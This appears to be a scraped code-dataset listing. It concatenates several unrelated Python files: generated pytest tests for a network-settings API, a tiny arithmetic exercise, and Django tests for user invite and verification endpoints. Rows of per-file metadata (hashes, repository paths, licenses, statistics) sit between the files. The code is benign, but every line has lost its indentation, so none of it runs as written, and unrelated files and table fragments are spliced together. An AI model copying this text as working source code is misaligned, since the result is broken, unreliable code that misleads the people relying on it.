endpoint_result = api.network_settings.get_network(
site_id='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_get_network(api, validator):
try:
assert is_valid_get_network(
validator,
get_network(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def get_network_default(api):
endpoint_result = api.network_settings.get_network(
site_id=None
)
return endpoint_result
@pytest.mark.network_settings
def test_get_network_default(api, validator):
try:
assert is_valid_get_network(
validator,
get_network_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_create_network(json_schema_validate, obj):
json_schema_validate('jsd_6eca62ef076b5627a85b2a5959613fb8_v2_2_2_3').validate(obj)
return True
def create_network(api):
endpoint_result = api.network_settings.create_network(
active_validation=True,
payload=None,
settings={'dhcpServer': ['string'], 'dnsServer': {'domainName': 'string', 'primaryIpAddress': 'string', 'secondaryIpAddress': 'string'}, 'syslogServer': {'ipAddresses': ['string'], 'configureDnacIP': True}, 'snmpServer': {'ipAddresses': ['string'], 'configureDnacIP': True}, 'netflowcollector': {'ipAddress': 'string', 'port': 0}, 'ntpServer': ['string'], 'timezone': 'string', 'messageOfTheday': {'bannerMessage': 'string', 'retainExistingBanner': True}, 'network_aaa': {'servers': 'string', 'ipAddress': 'string', 'network': 'string', 'protocol': 'string', 'sharedSecret': 'string', 'additionalIp': ['string']}, 'clientAndEndpoint_aaa': {'servers': 'string', 'ipAddress': 'string', 'network': 'string', 'protocol': 'string', 'sharedSecret': 'string', 'additionalIp': ['string']}},
site_id='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_create_network(api, validator):
try:
assert is_valid_create_network(
validator,
create_network(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def create_network_default(api):
endpoint_result = api.network_settings.create_network(
active_validation=True,
payload=None,
settings=None,
site_id='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_create_network_default(api, validator):
try:
assert is_valid_create_network(
validator,
create_network_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_update_network(json_schema_validate, obj):
json_schema_validate('jsd_e1b8c435195d56368c24a54dcce007d0_v2_2_2_3').validate(obj)
return True
def update_network(api):
endpoint_result = api.network_settings.update_network(
active_validation=True,
payload=None,
settings={'dhcpServer': ['string'], 'dnsServer': {'domainName': 'string', 'primaryIpAddress': 'string', 'secondaryIpAddress': 'string'}, 'syslogServer': {'ipAddresses': ['string'], 'configureDnacIP': True}, 'snmpServer': {'ipAddresses': ['string'], 'configureDnacIP': True}, 'netflowcollector': {'ipAddress': 'string', 'port': 0}, 'ntpServer': ['string'], 'timezone': 'string', 'messageOfTheday': {'bannerMessage': 'string', 'retainExistingBanner': True}, 'network_aaa': {'servers': 'string', 'ipAddress': 'string', 'network': 'string', 'protocol': 'string', 'sharedSecret': 'string', 'additionalIp': ['string']}, 'clientAndEndpoint_aaa': {'servers': 'string', 'ipAddress': 'string', 'network': 'string', 'protocol': 'string', 'sharedSecret': 'string', 'additionalIp': ['string']}},
site_id='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_update_network(api, validator):
try:
assert is_valid_update_network(
validator,
update_network(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def update_network_default(api):
endpoint_result = api.network_settings.update_network(
active_validation=True,
payload=None,
settings=None,
site_id='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_update_network_default(api, validator):
try:
assert is_valid_update_network(
validator,
update_network_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_get_reserve_ip_subpool(json_schema_validate, obj):
json_schema_validate('jsd_274851d84253559e9d3e81881a4bd2fc_v2_2_2_3').validate(obj)
return True
def get_reserve_ip_subpool(api):
endpoint_result = api.network_settings.get_reserve_ip_subpool(
limit='string',
offset='string',
site_id='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_get_reserve_ip_subpool(api, validator):
try:
assert is_valid_get_reserve_ip_subpool(
validator,
get_reserve_ip_subpool(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def get_reserve_ip_subpool_default(api):
endpoint_result = api.network_settings.get_reserve_ip_subpool(
limit=None,
offset=None,
site_id=None
)
return endpoint_result
@pytest.mark.network_settings
def test_get_reserve_ip_subpool_default(api, validator):
try:
assert is_valid_get_reserve_ip_subpool(
validator,
get_reserve_ip_subpool_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_release_reserve_ip_subpool(json_schema_validate, obj):
json_schema_validate('jsd_eabbb425255a57578e9db00cda1f303a_v2_2_2_3').validate(obj)
return True
def release_reserve_ip_subpool(api):
endpoint_result = api.network_settings.release_reserve_ip_subpool(
id='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_release_reserve_ip_subpool(api, validator):
try:
assert is_valid_release_reserve_ip_subpool(
validator,
release_reserve_ip_subpool(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def release_reserve_ip_subpool_default(api):
endpoint_result = api.network_settings.release_reserve_ip_subpool(
id='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_release_reserve_ip_subpool_default(api, validator):
try:
assert is_valid_release_reserve_ip_subpool(
validator,
release_reserve_ip_subpool_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_reserve_ip_subpool(json_schema_validate, obj):
json_schema_validate('jsd_700808cec6c85d9bb4bcc8f61f31296b_v2_2_2_3').validate(obj)
return True
def reserve_ip_subpool(api):
endpoint_result = api.network_settings.reserve_ip_subpool(
active_validation=True,
ipv4DhcpServers=['string'],
ipv4DnsServers=['string'],
ipv4GateWay='string',
ipv4GlobalPool='string',
ipv4Prefix=True,
ipv4PrefixLength=0,
ipv4Subnet='string',
ipv4TotalHost=0,
ipv6AddressSpace=True,
ipv6DhcpServers=['string'],
ipv6DnsServers=['string'],
ipv6GateWay='string',
ipv6GlobalPool='string',
ipv6Prefix=True,
ipv6PrefixLength=0,
ipv6Subnet='string',
ipv6TotalHost=0,
name='string',
payload=None,
site_id='string',
slaacSupport=True,
type='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_reserve_ip_subpool(api, validator):
try:
assert is_valid_reserve_ip_subpool(
validator,
reserve_ip_subpool(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def reserve_ip_subpool_default(api):
endpoint_result = api.network_settings.reserve_ip_subpool(
active_validation=True,
ipv4DhcpServers=None,
ipv4DnsServers=None,
ipv4GateWay=None,
ipv4GlobalPool=None,
ipv4Prefix=None,
ipv4PrefixLength=None,
ipv4Subnet=None,
ipv4TotalHost=None,
ipv6AddressSpace=None,
ipv6DhcpServers=None,
ipv6DnsServers=None,
ipv6GateWay=None,
ipv6GlobalPool=None,
ipv6Prefix=None,
ipv6PrefixLength=None,
ipv6Subnet=None,
ipv6TotalHost=None,
name=None,
payload=None,
site_id='string',
slaacSupport=None,
type=None
)
return endpoint_result
@pytest.mark.network_settings
def test_reserve_ip_subpool_default(api, validator):
try:
assert is_valid_reserve_ip_subpool(
validator,
reserve_ip_subpool_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_update_reserve_ip_subpool(json_schema_validate, obj):
json_schema_validate('jsd_07fd6083b0c65d03b2d53f10b3ece59d_v2_2_2_3').validate(obj)
return True
def update_reserve_ip_subpool(api):
endpoint_result = api.network_settings.update_reserve_ip_subpool(
active_validation=True,
id='string',
ipv4DhcpServers=['string'],
ipv4DnsServers=['string'],
ipv6AddressSpace=True,
ipv6DhcpServers=['string'],
ipv6DnsServers=['string'],
ipv6GateWay='string',
ipv6GlobalPool='string',
ipv6Prefix=True,
ipv6PrefixLength=0,
ipv6Subnet='string',
ipv6TotalHost=0,
name='string',
payload=None,
site_id='string',
slaacSupport=True
)
return endpoint_result
@pytest.mark.network_settings
def test_update_reserve_ip_subpool(api, validator):
try:
assert is_valid_update_reserve_ip_subpool(
validator,
update_reserve_ip_subpool(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def update_reserve_ip_subpool_default(api):
endpoint_result = api.network_settings.update_reserve_ip_subpool(
active_validation=True,
id=None,
ipv4DhcpServers=None,
ipv4DnsServers=None,
ipv6AddressSpace=None,
ipv6DhcpServers=None,
ipv6DnsServers=None,
ipv6GateWay=None,
ipv6GlobalPool=None,
ipv6Prefix=None,
ipv6PrefixLength=None,
ipv6Subnet=None,
ipv6TotalHost=None,
name=None,
payload=None,
site_id='string',
slaacSupport=None
)
return endpoint_result
@pytest.mark.network_settings
def test_update_reserve_ip_subpool_default(api, validator):
try:
assert is_valid_update_reserve_ip_subpool(
validator,
update_reserve_ip_subpool_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_get_service_provider_details(json_schema_validate, obj):
json_schema_validate('jsd_69dda850a0675b888048adf8d488aec1_v2_2_2_3').validate(obj)
return True
def get_service_provider_details(api):
endpoint_result = api.network_settings.get_service_provider_details(
)
return endpoint_result
@pytest.mark.network_settings
def test_get_service_provider_details(api, validator):
try:
assert is_valid_get_service_provider_details(
validator,
get_service_provider_details(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def get_service_provider_details_default(api):
endpoint_result = api.network_settings.get_service_provider_details(
)
return endpoint_result
@pytest.mark.network_settings
def test_get_service_provider_details_default(api, validator):
try:
assert is_valid_get_service_provider_details(
validator,
get_service_provider_details_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_create_sp_profile(json_schema_validate, obj):
json_schema_validate('jsd_1ffa347eb411567a9c793696795250a5_v2_2_2_3').validate(obj)
return True
def create_sp_profile(api):
endpoint_result = api.network_settings.create_sp_profile(
active_validation=True,
payload=None,
settings={'qos': [{'profileName': 'string', 'model': 'string', 'wanProvider': 'string'}]}
)
return endpoint_result
@pytest.mark.network_settings
def test_create_sp_profile(api, validator):
try:
assert is_valid_create_sp_profile(
validator,
create_sp_profile(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def create_sp_profile_default(api):
endpoint_result = api.network_settings.create_sp_profile(
active_validation=True,
payload=None,
settings=None
)
return endpoint_result
@pytest.mark.network_settings
def test_create_sp_profile_default(api, validator):
try:
assert is_valid_create_sp_profile(
validator,
create_sp_profile_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_update_sp_profile(json_schema_validate, obj):
json_schema_validate('jsd_03e22c99a82f5764828810acb45e7a9e_v2_2_2_3').validate(obj)
return True
def update_sp_profile(api):
endpoint_result = api.network_settings.update_sp_profile(
active_validation=True,
payload=None,
settings={'qos': [{'profileName': 'string', 'model': 'string', 'wanProvider': 'string', 'oldProfileName': 'string'}]}
)
return endpoint_result
@pytest.mark.network_settings
def test_update_sp_profile(api, validator):
try:
assert is_valid_update_sp_profile(
validator,
update_sp_profile(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def update_sp_profile_default(api):
endpoint_result = api.network_settings.update_sp_profile(
active_validation=True,
payload=None,
settings=None
)
return endpoint_result
@pytest.mark.network_settings
def test_update_sp_profile_default(api, validator):
try:
assert is_valid_update_sp_profile(
validator,
update_sp_profile_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
def is_valid_delete_sp_profile(json_schema_validate, obj):
json_schema_validate('jsd_cc405e5a256e56788537e12f91de4029_v2_2_2_3').validate(obj)
return True
def delete_sp_profile(api):
endpoint_result = api.network_settings.delete_sp_profile(
sp_profile_name='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_delete_sp_profile(api, validator):
try:
assert is_valid_delete_sp_profile(
validator,
delete_sp_profile(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest)):
print(original_e)
raise original_e
def delete_sp_profile_default(api):
endpoint_result = api.network_settings.delete_sp_profile(
sp_profile_name='string'
)
return endpoint_result
@pytest.mark.network_settings
def test_delete_sp_profile_default(api, validator):
try:
assert is_valid_delete_sp_profile(
validator,
delete_sp_profile_default(api)
)
except Exception as original_e:
with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
raise original_e
| 31.497126 | 790 | 0.69799 | 3,596 | 32,883 | 6.050334 | 0.076752 | 0.041366 | 0.032357 | 0.03677 | 0.880912 | 0.876316 | 0.85669 | 0.850301 | 0.834306 | 0.799421 | 0 | 0.022814 | 0.214853 | 32,883 | 1,043 | 791 | 31.527325 | 0.819893 | 0.034668 | 0 | 0.648715 | 0 | 0 | 0.107796 | 0.029682 | 0 | 0 | 0 | 0 | 0.04896 | 1 | 0.122399 | false | 0.002448 | 0.004896 | 0 | 0.200734 | 0.02448 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4de31d01bac544683a419465b82a5c4b6e4cbd11 | 34 | py | Python | chapter-02/exercise005.py | krastin/pp-cs3.0 | 502be9aac2d84215db176864e443c219e5e26591 | [
"MIT"
] | null | null | null | chapter-02/exercise005.py | krastin/pp-cs3.0 | 502be9aac2d84215db176864e443c219e5e26591 | [
"MIT"
] | null | null | null | chapter-02/exercise005.py | krastin/pp-cs3.0 | 502be9aac2d84215db176864e443c219e5e26591 | [
"MIT"
] | null | null | null | x = 10.5
y = 4
x += y
print(x, y)
| 6.8 | 11 | 0.441176 | 10 | 34 | 1.5 | 0.6 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 0.323529 | 34 | 4 | 12 | 8.5 | 0.478261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4de3c09e0c747e46527314279fb00f998db33da5 | 10,741 | py | Python | supportal/tests/app/views/test_invite_views.py | Elizabeth-Warren/supportal-backend | e55b0e8fd154730bab1708f27386b2adcb18cfbc | [
"MIT"
] | 34 | 2020-03-27T14:59:04.000Z | 2021-11-15T10:24:12.000Z | supportal/tests/app/views/test_invite_views.py | Elizabeth-Warren/supportal-backend | e55b0e8fd154730bab1708f27386b2adcb18cfbc | [
"MIT"
] | 5 | 2021-03-18T22:51:05.000Z | 2022-02-10T15:03:33.000Z | supportal/tests/app/views/test_invite_views.py | Elizabeth-Warren/supportal-backend | e55b0e8fd154730bab1708f27386b2adcb18cfbc | [
"MIT"
] | 14 | 2020-03-27T17:36:39.000Z | 2020-06-18T21:47:43.000Z | import json
import unittest
import pytest
from django.conf import settings
from model_bakery import baker
from rest_framework import status
from supportal.app.common.enums import CanvassResult
from supportal.app.models import EmailSend, User, VolProspectAssignment
from supportal.app.models.user import UserManager
from supportal.tests import utils
@pytest.mark.django_db
def test_fails_with_no_input(api_client, supportal_admin_user):
auth = utils.id_auth(supportal_admin_user)
res = api_client.post(
f"/v1/invites/", data=json.dumps({}), content_type="application/json", **auth
)
assert res.status_code == status.HTTP_400_BAD_REQUEST
@pytest.mark.django_db
def test_fails_with_invalid_email(api_client, supportal_admin_user):
auth = utils.id_auth(supportal_admin_user)
res = api_client.post(
f"/v1/invites/",
data=json.dumps({"email": "iamnotanemail"}),
content_type="application/json",
**auth,
)
assert res.status_code == status.HTTP_400_BAD_REQUEST
@pytest.mark.django_db
def test_invite_and_create_user(mocker, api_client, supportal_admin_user):
email_to_send = "sgoldblatt@elizabethwarren.com"
assert User.objects.filter(email=email_to_send).count() == 0
auth = utils.id_auth(supportal_admin_user)
mocker.patch.object(
UserManager, "create_cognito_user", return_value={"User": {"Username": "12345"}}
)
with unittest.mock.patch(
"supportal.app.models.user.get_email_service"
) as email_mock:
res = api_client.post(
f"/v1/invites/",
data=json.dumps({"email": email_to_send}),
content_type="application/json",
**auth,
)
email_mock.return_value.send_email.assert_called_with(
configuration_set_name="organizing_emails",
from_email=settings.FROM_EMAIL,
payload={
"email": "sgoldblatt@elizabethwarren.com",
"switchboard_signup_url": settings.SUPPORTAL_BASE_URL,
"transactional": True,
},
recipient="sgoldblatt@elizabethwarren.com",
reply_to_email=settings.REPLY_TO_EMAIL,
template_name="switchboard_invite_email",
application_name="supportal",
)
assert res.status_code == status.HTTP_201_CREATED
users = User.objects.filter(email=email_to_send)
assert users.count() == 1
user = users.first()
assert user.added_by == supportal_admin_user
assert user.verified_at
UserManager.create_cognito_user.assert_called_with(email_to_send)
@pytest.mark.django_db
@unittest.mock.patch("supportal.app.views.invite_views.get_email_service")
def test_invite_user_already_created(
mock, api_client, cambridge_leader_user, hayes_valley_leader_user
):
cambridge_leader_user.added_by = hayes_valley_leader_user
cambridge_leader_user.save()
assert not hayes_valley_leader_user.is_admin
assert not hayes_valley_leader_user.is_staff
assert not hayes_valley_leader_user.is_superuser
for i in range(0, 10):
vpa = baker.make("VolProspectAssignment", user=cambridge_leader_user)
vpa.create_contact_event(
result=CanvassResult.UNREACHABLE_MOVED, metadata={"moved_to": "CA"}
)
hvpa = baker.make("VolProspectAssignment", user=hayes_valley_leader_user)
hvpa.create_contact_event(
result=CanvassResult.UNREACHABLE_MOVED, metadata={"moved_to": "CA"}
)
email_to_send = cambridge_leader_user.email
auth = utils.id_auth(hayes_valley_leader_user)
res = api_client.post(
f"/v1/invites/",
data=json.dumps({"email": email_to_send}),
content_type="application/json",
**auth,
)
assert res.status_code == status.HTTP_204_NO_CONTENT
assert User.objects.filter(email=email_to_send).count() == 1
@pytest.mark.django_db
@unittest.mock.patch("supportal.app.views.invite_views.get_email_service")
def test_invite_available(
mock, api_client, cambridge_leader_user, hayes_valley_leader_user
):
cambridge_leader_user.added_by = hayes_valley_leader_user
cambridge_leader_user.save()
assert not hayes_valley_leader_user.is_admin
assert not hayes_valley_leader_user.is_staff
assert not hayes_valley_leader_user.is_superuser
email_to_send = cambridge_leader_user.email
auth = utils.id_auth(hayes_valley_leader_user)
res = api_client.get(f"/v1/invites/available/", **auth)
assert res.status_code == status.HTTP_200_OK
assert res.data["has_invite"] is False
assert res.data["remaining_contacts_count"] == 10
assert res.data["latest_invite"]["email"] == cambridge_leader_user.email
assert res.data["latest_invite"]["remaining_contacts_count"] == 10
for i in range(0, 15):
vpa = baker.make("VolProspectAssignment", user=cambridge_leader_user)
vpa.create_contact_event(
result=CanvassResult.UNREACHABLE_MOVED, metadata={"moved_to": "CA"}
)
hvpa = baker.make("VolProspectAssignment", user=hayes_valley_leader_user)
hvpa.create_contact_event(
result=CanvassResult.UNREACHABLE_MOVED, metadata={"moved_to": "CA"}
)
res = api_client.get(f"/v1/invites/available/", **auth)
assert res.status_code == status.HTTP_200_OK
assert res.data["has_invite"]
assert res.data["remaining_contacts_count"] == 0
assert res.data["latest_invite"]["email"] == cambridge_leader_user.email
assert res.data["latest_invite"]["remaining_contacts_count"] == 0
@pytest.mark.django_db
@unittest.mock.patch("supportal.app.views.invite_views.get_email_service")
def test_invite_cant_send(
mock, api_client, cambridge_leader_user, hayes_valley_leader_user
):
assert not hayes_valley_leader_user.is_admin
assert not hayes_valley_leader_user.is_staff
assert not hayes_valley_leader_user.is_superuser
email_to_send = cambridge_leader_user.email
auth = utils.id_auth(hayes_valley_leader_user)
cambridge_leader_user.added_by = hayes_valley_leader_user
cambridge_leader_user.save()
res = api_client.post(
f"/v1/invites/",
data=json.dumps({"email": email_to_send}),
content_type="application/json",
**auth,
)
assert res.status_code == status.HTTP_403_FORBIDDEN
@pytest.mark.django_db
def test_bulk_verify_view(
api_client, supportal_admin_user, hayes_valley_leader_user, cambridge_leader_user
):
hayes_valley_leader_user.verified_at = None
cambridge_leader_user.verified_at = None
hayes_valley_leader_user.save()
cambridge_leader_user.save()
auth = utils.id_auth(supportal_admin_user)
with unittest.mock.patch(
"supportal.app.views.invite_views.get_email_service"
) as email_mock:
res = api_client.post(
f"/v1/verify",
data=json.dumps(
{
"emails": [
hayes_valley_leader_user.email,
cambridge_leader_user.email,
]
}
),
content_type="application/json",
**auth,
)
assert res.status_code == status.HTTP_200_OK
hayes_valley_leader_user.refresh_from_db()
cambridge_leader_user.refresh_from_db()
assert hayes_valley_leader_user.verified_at is not None
assert cambridge_leader_user.verified_at is not None
@pytest.mark.django_db
def test_verify_view(api_client, supportal_admin_user, hayes_valley_leader_user):
hayes_valley_leader_user.verified_at = None
hayes_valley_leader_user.save()
VolProspectAssignment.objects.assign(hayes_valley_leader_user)
email_to_verify = hayes_valley_leader_user.email
assert hayes_valley_leader_user.verified_at is None
assert (
hayes_valley_leader_user.vol_prospect_assignments.get_demo_queryset().count()
== 10
)
assert (
hayes_valley_leader_user.vol_prospect_assignments.filter(
person__is_demo=False
).count()
== 0
)
auth = utils.id_auth(supportal_admin_user)
with unittest.mock.patch(
"supportal.app.views.invite_views.get_email_service"
) as email_mock:
res = api_client.post(
f"/v1/verify",
data=json.dumps({"email": email_to_verify}),
content_type="application/json",
**auth,
)
# call again because all these methods call twice
api_client.post(
f"/v1/verify",
data=json.dumps({"email": email_to_verify}),
content_type="application/json",
**auth,
)
assert res.status_code == status.HTTP_200_OK
email_mock.return_value.send_email.assert_called_once_with(
configuration_set_name="organizing_emails",
from_email=settings.FROM_EMAIL,
payload={"email": email_to_verify, "transactional": True},
recipient=email_to_verify,
reply_to_email=settings.REPLY_TO_EMAIL,
template_name=EmailSend.VERIFIED_EMAIL,
application_name="supportal",
)
hayes_valley_leader_user.refresh_from_db()
assert hayes_valley_leader_user.verified_at is not None
assert (
hayes_valley_leader_user.vol_prospect_assignments.get_demo_queryset().count()
== 0
)
@pytest.mark.django_db
def test_verify_view_non_admin(api_client, hayes_valley_leader_user):
hayes_valley_leader_user.verified_at = None
hayes_valley_leader_user.save()
email_to_verify = hayes_valley_leader_user.email
assert hayes_valley_leader_user.verified_at is None
auth = utils.id_auth(hayes_valley_leader_user)
res = api_client.post(
f"/v1/verify",
data=json.dumps({"email": email_to_verify}),
content_type="application/json",
**auth,
)
assert res.status_code == status.HTTP_403_FORBIDDEN
hayes_valley_leader_user.refresh_from_db()
assert hayes_valley_leader_user.verified_at is None
@pytest.mark.django_db
def test_verify_view_user_created(mocker, api_client, supportal_admin_user):
email = "sgoldblatt-test@elizabethwarren.com"
auth = utils.id_auth(supportal_admin_user)
mocker.patch.object(
UserManager, "create_cognito_user", return_value={"User": {"Username": "12345"}}
)
with unittest.mock.patch("supportal.app.views.invite_views.get_email_service"):
res = api_client.post(
f"/v1/verify",
data=json.dumps({"email": email}),
content_type="application/json",
**auth,
)
assert res.status_code == status.HTTP_200_OK
created_user = User.objects.get(email=email)
assert created_user.verified_at is not None
| 34.986971 | 88 | 0.703473 | 1,375 | 10,741 | 5.12 | 0.121455 | 0.09517 | 0.108665 | 0.134233 | 0.838494 | 0.823153 | 0.801989 | 0.778125 | 0.747159 | 0.705114 | 0 | 0.008626 | 0.201285 | 10,741 | 306 | 89 | 35.101307 | 0.811983 | 0.004376 | 0 | 0.618677 | 0 | 0 | 0.126169 | 0.069024 | 0 | 0 | 0 | 0 | 0.178988 | 1 | 0.038911 | false | 0 | 0.038911 | 0 | 0.077821 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.